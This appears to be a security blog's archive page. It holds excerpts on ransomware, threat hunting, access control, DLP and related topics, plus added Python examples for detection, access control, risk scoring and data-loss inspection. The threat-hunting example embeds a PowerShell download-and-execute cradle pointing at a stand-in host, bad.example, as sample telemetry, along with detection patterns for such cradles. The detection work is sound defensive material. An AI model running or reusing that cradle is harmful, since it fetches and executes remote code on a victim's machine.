Posts

Showing posts from September, 2022

NIST Cyber Security Framework


Ransomware : Beware of the Blackmailer

“Ransomware is more about manipulating vulnerabilities in human psychology than the adversary's technological sophistication” ― James Scott, Sr.

In May 2017, the "WannaCry" ransomware hit over 300,000 computers worldwide, spreading through networks by exploiting an SMB vulnerability in Microsoft Windows. WannaCry encrypted organisations' files and demanded $300 worth of Bitcoin for the decryption key. In March 2021, insurance giant CNA Financial paid $40 million in Bitcoin to recover its data after a Phoenix CryptoLocker ransomware attack. In June 2021, JBS Foods paid $11 million in Bitcoin to a Russian hacker group to prevent further disruption from a ransomware attack. Ransomware is malware that, once it infects a computer, encrypts the data and denies access to the files, holding the system hostage. The culprit demands a ransom payment in exchange for the key to decrypt the files. Ransomware has become the most prominent malware today. It spreads

Defence in Depth : Lord of the Rings in Cyber Security

Image: Michael Fisher

At the heart of your business is data. Protecting your data from malicious actors requires effective strategies. Defence in Depth (DiD) is a security strategy that uses a series of defensive mechanisms to protect your information assets. Because the defences are layered, when a malicious actor breaks one mechanism, the next mechanism steps up to block the attack. DiD is not a new concept: medieval castles used ditches, ramparts, drawbridges, towers, battlements and gates for defence. The defensive layers can be a single control or a combination of physical, technical and administrative controls. Administrative controls define the organisation's policies and procedures that restrict certain behaviours to ensure security. Technical controls are implemented in software and hardware to protect system resources. Physical controls protect systems by restricting unauthorised physical access. In web applications, Defence in Depth is achieved with Web Applic

Threat intelligence : Know Your Enemy

Image: Tripwire

"If you know the enemy and know yourself you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." - Sun Tzu

Threat Intelligence (TI) is the gathering, processing and analysis of evidence-based knowledge to understand threats and threat actors' motives, targets and attack behaviours. Threat intelligence gives defenders the information they need to protect their information assets, so it is a critical component of an organisation's overall security posture and risk management process. TI helps in understanding the nature of threats and identifying vulnerabilities, so that appropriate security strategies and controls can be deployed to reduce risk. Threat intelligence is important for learning about unknown threats, making better security decisions, revealing attacker motives and tactic

Threat Hunting with TTPs : Hunting of the Hunter

Image: heimdalsecurity

Threat hunting is a proactive process in cyber security that searches for security risks concealed within an organisation's network, data and endpoints. It entails diving deeply into the IT environment to identify threat actors and attack vectors. If an external attacker or an insider can elude the initial network defences, they may remain undetected within the network, collecting data, stealing passwords, secretly eavesdropping on communications, or using network resources to launch further attacks. Threat hunting is therefore essential to a defence strategy that aims to stop Advanced Persistent Threats (APTs) from persisting in the network. Threat hunting involves three steps.

1. Trigger: A trigger alerts the threat hunter when the threat detection system discovers unusual behaviour indicating malicious activity. This causes the threat hunter to initiate further investigation of the event to verify whether it is an incident to act upon.
2. Investiga
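As an added illustration (not code from the original post), the trigger step above can be written as hunting rules run over process-creation telemetry, and the same pass can match the indicators of compromise that the threat intelligence post describes. The events, the indicator domain bad.example and the ATT&CK technique mapping are all constructed for this example:

```python
import base64
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon-style fields, not real telemetry).
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://bad.example/p.ps1')"
    .encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -EncodedCommand " + ENCODED_CRADLE},
    {"host": "ws02", "user": "bob", "parent": "WINWORD.EXE",
     "cmd": "cmd.exe /c whoami"},
    {"host": "srv01", "user": "svc_backup", "parent": "services.exe",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# Constructed threat-intelligence indicator list (hypothetical domain).
TI_DOMAINS = {"bad.example"}

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass
class Finding:
    host: str
    ttp: str      # ATT&CK technique ID as mapped in this illustration
    reason: str


def decode_encoded_command(cmd):
    """Return the decoded script if cmd carries a PowerShell -EncodedCommand
    (base64 of UTF-16LE text), otherwise None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events, ti_domains):
    """Triggers that move an event from 'noise' to 'investigate': encoded
    PowerShell, download cradles, Office applications spawning a shell, and
    any contact with a threat-intelligence indicator."""
    findings = []
    for ev in events:
        cmd = ev["cmd"]
        exe = cmd.split()[0].lower()
        parent = ev["parent"].lower()
        decoded = decode_encoded_command(cmd)
        # Hunt on the decoded script when there is one, else the raw command line.
        text = decoded if decoded is not None else cmd
        if decoded is not None:
            findings.append(Finding(ev["host"], "T1059.001", "PowerShell -EncodedCommand"))
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", text, re.I):
            findings.append(Finding(ev["host"], "T1105", "download cradle in command line"))
        if parent in OFFICE_APPS and exe in SHELLS:
            findings.append(Finding(ev["host"], "T1204.002", f"{parent} spawned {exe}"))
        for domain in ti_domains:
            if domain in text.lower():
                findings.append(Finding(ev["host"], "TI-IOC", f"contact with {domain}"))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, TI_DOMAINS):
        print(f"{f.host}: {f.ttp} - {f.reason}")
```

Decoding the -EncodedCommand payload before matching is the point: an indicator or download cradle hidden inside base64 never appears in the raw command line, so a hunt that only greps the command line misses it. The backup script on srv01 produces no finding, which is what keeps the trigger usable as a starting point for investigation rather than a source of noise.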

Security Policy Framework : The Begining of Defence

Image: Workable Resources

The security policy provides the framework for the multi-layered information security of your organisation. It encompasses the vision of senior management, the regulations applicable to business operations, and guidance for achieving your security goals. A security policy document establishes a structure to ensure that effective security strategies and controls are in place, and that roles and responsibilities are assigned and communicated across the organisation, to address information security issues. Security documentation follows a hierarchy, starting from security policies, followed by standards, guidelines and procedures. Compliance with policies, standards and procedures is mandatory; guidelines are optional. Security Policies: Security policies describe the organisation's security goals. They provide an overview of security needs, establish the security scope and define the resources required to ensure security. Security policies are mainly of three types: Orga

Access Control Systems : The last line of defence

Image: Threatblock

Access is the ability of a user to perform a specific task, such as viewing, creating or modifying a file. A control is a countermeasure or safeguard designed to preserve the confidentiality, integrity and availability of information within an organisation. Access control is a security technique that limits who or what can view or use resources according to set rules, to minimise risk to the business. There are three types of access control: physical, logical and administrative. Physical access control limits access to buildings, server rooms and physical information assets. Logical access control limits access to computer networks, operating systems, files and data. Administrative controls determine which users have access to what information in an organisation. Electronic access control systems using user credentials and card readers can prevent or track unauthorised access to restricted locations such as data centres. Logical access controls use identifi
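The logical access control described above, as an added example that is not part of the original post: a deny-by-default, role-based check in which the administrative control (who holds which role) is kept separate from the technical control (what each role may do), and roles inherit from a parent role. The users, roles, resources and permissions are constructed for illustration:

```python
from dataclasses import dataclass

# Constructed role definitions: each role lists the (resource, action) pairs it
# is explicitly granted, and may inherit from one parent role.
ROLE_PERMISSIONS = {
    "reader":  {("reports", "view")},
    "analyst": {("reports", "create"), ("reports", "edit")},
    "admin":   {("reports", "delete"), ("users", "modify")},
}
ROLE_PARENTS = {"analyst": "reader", "admin": "analyst"}

# Constructed subject-to-role assignment (the administrative control).
USER_ROLES = {"alice": {"reader"}, "bob": {"analyst"}, "carol": {"admin"}}


def effective_permissions(role):
    """Collect a role's own grants plus everything inherited up the parent chain."""
    perms = set()
    seen = set()
    while role and role not in seen:
        seen.add(role)                      # guards against a mis-configured cycle
        perms |= ROLE_PERMISSIONS.get(role, set())
        role = ROLE_PARENTS.get(role)
    return perms


@dataclass
class Decision:
    allowed: bool
    reason: str


def authorize(user, resource, action):
    """Deny by default: only an explicit grant on one of the user's roles allows
    the action. Every decision carries a reason so it can be logged and audited."""
    roles = USER_ROLES.get(user)
    if not roles:
        return Decision(False, f"unknown subject {user!r}")
    for role in sorted(roles):
        if (resource, action) in effective_permissions(role):
            return Decision(True, f"{user} granted {action} on {resource} via role {role}")
    return Decision(False, f"{user} has no role permitting {action} on {resource}")


if __name__ == "__main__":
    for req in [("alice", "reports", "view"), ("alice", "reports", "edit"),
                ("carol", "users", "modify"), ("mallory", "reports", "view")]:
        d = authorize(*req)
        print("ALLOW" if d.allowed else "DENY ", d.reason)
```

The design choice worth noting is that nothing is allowed unless a rule says so: an unknown user, an unknown role or a typo in a permission name all fall through to a deny, which is the failure mode you want from the last line of defence.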

Social Engineering : Hacking the Human Vulnerabilities

Image: Zootopia

Social engineering has become the biggest cyber threat today. In social engineering the target is a human, who cannot be patched: humans continue to carry zero-day vulnerabilities and are the most vulnerable endpoint. An attacker uses social engineering techniques to deceive and manipulate a victim into divulging sensitive information such as credentials, then uses that information to gain unauthorised access to systems and carry out an attack. Social engineering criminals hide their true identities and motives, presenting themselves as trusted individuals or high-ranking officials of the organisation. Their objective is to deceive, trick, influence and manipulate the victim into giving up information willingly. They exploit emotions such as fear, greed, curiosity, fatigue, ambition, urgency, helpfulness and empathy. Social engineering is a popular tactic among attackers because it is easier to exploit people than to find a network or software vul

Risk-Based Vulnerability Management: An Automated Remediation to manage Risks

Image: Cyber Plus Sentinel

Vulnerability management is a proactive process that is critical to endpoint security. It aims to mitigate vulnerabilities before they lead to a breach. Vulnerability management is a cyclic process: it identifies information assets, then correlates them with a continually updated vulnerability database to identify potential threats, misconfigurations and vulnerabilities. It also assesses the potential impact and probability of the risks created by those vulnerabilities, so that serious threats can be responded to early. The Forrester Global Security Survey states that "49% of organizations have suffered one or more breaches in the past year", with software vulnerabilities the largest cause. A single vulnerability can let an attacker intrude and steal data. New security holes appear every day, many of them with exploits available, which highlights the importance of vulnerability management in an organisation's security strategy. The Center for
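An added example of the risk-based prioritisation the post describes (not the author's code or any scanner's scoring): the CVSS base score is scaled by asset criticality, exposure and whether an exploit exists or is being used, so that a lower-scored flaw on an exposed critical system outranks a higher-scored one on an isolated lab box. The weights, SLA tiers, asset names and VULN identifiers are assumptions for this illustration:

```python
from dataclasses import dataclass


@dataclass
class Asset:
    name: str
    criticality: int         # 1 = lab/test .. 3 = business critical (illustrative scale)
    internet_facing: bool


@dataclass
class Vuln:
    vuln_id: str             # placeholder identifiers, not real advisories
    asset: Asset
    cvss: float              # CVSS base score, 0-10
    exploit_public: bool     # working exploit code is publicly available
    exploited_in_wild: bool  # known to be actively exploited


# Weights and SLA tiers are assumptions for this illustration, not a standard.
W_EXPLOIT_PUBLIC = 1.5
W_EXPLOITED_IN_WILD = 2.0
W_INTERNET_FACING = 1.5


def risk_score(v):
    """Severity (CVSS) scaled by what matters to the business: asset criticality,
    exposure, and whether attackers can actually use the flaw today."""
    score = v.cvss * v.asset.criticality
    if v.exploit_public:
        score *= W_EXPLOIT_PUBLIC
    if v.exploited_in_wild:
        score *= W_EXPLOITED_IN_WILD
    if v.asset.internet_facing:
        score *= W_INTERNET_FACING
    return score


def remediation_sla_days(score):
    """Map a risk score to a remediation deadline (hypothetical tiers)."""
    if score >= 50:
        return 2
    if score >= 20:
        return 7
    if score >= 10:
        return 30
    return 90


def prioritize(vulns):
    """Return the findings ordered for remediation, highest risk first."""
    return sorted(vulns, key=risk_score, reverse=True)


# Constructed findings for illustration.
LAB_BOX = Asset("lab-vm-07", criticality=1, internet_facing=False)
WEB_PORTAL = Asset("customer-portal", criticality=3, internet_facing=True)
PARTNER_API = Asset("partner-api", criticality=2, internet_facing=True)

SAMPLE_VULNS = [
    Vuln("VULN-A", LAB_BOX, cvss=9.8, exploit_public=False, exploited_in_wild=False),
    Vuln("VULN-B", WEB_PORTAL, cvss=7.5, exploit_public=True, exploited_in_wild=True),
    Vuln("VULN-C", PARTNER_API, cvss=6.5, exploit_public=True, exploited_in_wild=False),
]

if __name__ == "__main__":
    for v in prioritize(SAMPLE_VULNS):
        s = risk_score(v)
        print(f"{v.vuln_id} on {v.asset.name}: CVSS {v.cvss}, risk {s:.1f}, "
              f"fix within {remediation_sla_days(s)} days")
```

On this input the CVSS 9.8 finding lands at the bottom of the queue with a 90-day deadline, while the CVSS 7.5 flaw that is exploited in the wild on the internet-facing portal gets two days. That inversion is the whole argument for risk-based rather than severity-based vulnerability management.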

Business Continuity Planning : Be Prepared for the Unexpected!.

Image: wallstreetmojo

What happens when a major data breach occurs, or a data centre network switch fails? How will you act when ransomware hits your ERP server? What will you do if your system administrator suffers a heart attack? These are everyday potential disasters. Have you planned for them? In practice, not all risks associated with a business function can be eliminated. Despite every effort, residual risk always remains, and incidents can still occur. Unavoidable situations or unexpected threats and vulnerabilities may bypass your security controls and affect the confidentiality, integrity or availability of your information assets. The objective of a Business Continuity Plan (BCP) is to restore business operations while recovering from a significant disruption after an incident. The business continuity policy defines what top management wants to achieve with business continuity. ISO 22301 requires the business continuity policy to be compatible

8 Domains of information Security for Your ISMS

Image: Guru99

According to the CISSP Common Body of Knowledge, organisations facing information security threats need to consider the following eight domains in their security strategy; an ISMS framework focuses on ensuring security across them. The eight domains are: Security & Risk Management; Asset Security; Security Engineering; Communication & Network Security; Identity & Access Management; Security Assessment & Testing; Security Operations; Software Development Security.

1. Security & Risk Management: establishes the security policies, procedures, guidelines, structures and standards to protect information assets and to review the effectiveness of the security controls.
2. Asset Security: establishes the procedures, structures, standards and controls used to secure and monitor assets to enforce confidentiality, integrity and availability.
3. Security Engineering: establishes the concepts, structures and standards to design and implement secure systems, networks and applications to enforce confidentiality,

Data Loss Prevention (DLP) Strategies for ISMS

Image: Somansa

Data loss is a major incident in cyber security risk management, and organisations must implement controls to detect and prevent breaches, exfiltration or destruction of sensitive data. Data loss can occur at servers, networks, cloud services, endpoints and mobile devices, as well as on paper forms, so it requires physical, technical and administrative controls. Data Loss Prevention (DLP) provides mitigation measures to protect and secure your data in compliance with data protection regulations. DLP covers the prevention of data loss and data leakage caused by ransomware, insiders, or attacks on applications, databases or networks. Its aim is to prevent unauthorised data transfers outside the organisation. DLP helps organisations to protect Personally Identifiable Information (PII) and intellectual property, achieve data visibility, secure the mobile workforce and enforce BYOD security, and protect cloud systems. Data leaks can happen due to the following cau
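As an added example (not code from the post or from any DLP product), a content-inspection check of the kind a DLP control runs on outbound messages: it detects payment card numbers by pattern plus a Luhn check, e-mail addresses, and a keyword marking intellectual property, then decides whether to block, log or allow the message and redacts any card number it found. The sample messages and the codename "Project Nightjar" are constructed:

```python
import re

# Constructed outbound messages (not real data).
SAMPLE_MESSAGES = [
    "Invoice attached, card 4111 1111 1111 1111 exp 12/26, contact jane@example.com",
    "Lunch at 12? Quarterly numbers look fine.",
    "Draft specs for Project Nightjar - do not forward",
    "Reference number 1234-5678-1234-5678 for your ticket",
]

# Constructed keyword list marking intellectual property (hypothetical codename).
IP_KEYWORDS = {"project nightjar"}

# 13-19 digits, optionally separated by spaces or dashes, not embedded in a longer digit run.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")


def luhn_valid(digits):
    """Luhn checksum: rejects most digit runs that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    """Return the card-number-looking substrings that also pass the Luhn check."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(m.group())
    return hits


def classify(text):
    """Tag the sensitive data classes present in the message."""
    return {
        "cards": find_card_numbers(text),
        "emails": EMAIL_RE.findall(text),
        "ip": [k for k in IP_KEYWORDS if k in text.lower()],
    }


def inspect_outbound(text):
    """Policy decision: block card data and intellectual property, log messages
    carrying e-mail addresses, allow the rest. Returns (action, redacted, classes)."""
    c = classify(text)
    if c["cards"] or c["ip"]:
        action = "block"
    elif c["emails"]:
        action = "log"
    else:
        action = "allow"
    redacted = text
    for card in c["cards"]:
        redacted = redacted.replace(card, "[REDACTED-PAN]")
    return action, redacted, c


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        action, redacted, classes = inspect_outbound(msg)
        print(f"{action.upper():5} {redacted}  {classes}")
```

The Luhn check is what separates a DLP rule from a noisy regex: the ticket reference in the last message has the shape of a card number but fails the checksum, so the message is allowed instead of blocking a harmless e-mail.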

Killing the Cyber Security Kill Chain : ISMS Video

Threat modelling aims to identify threats and vulnerabilities so that controls can be applied to mitigate the risks. "Killing the Cyber Security Kill Chain" is an approach to threat modelling with ISO 27001 controls, covering the kill chain phases of reconnaissance, intrusion, exploitation, privilege escalation, lateral movement, command and control, and exfiltration.

Niranjan Meegammana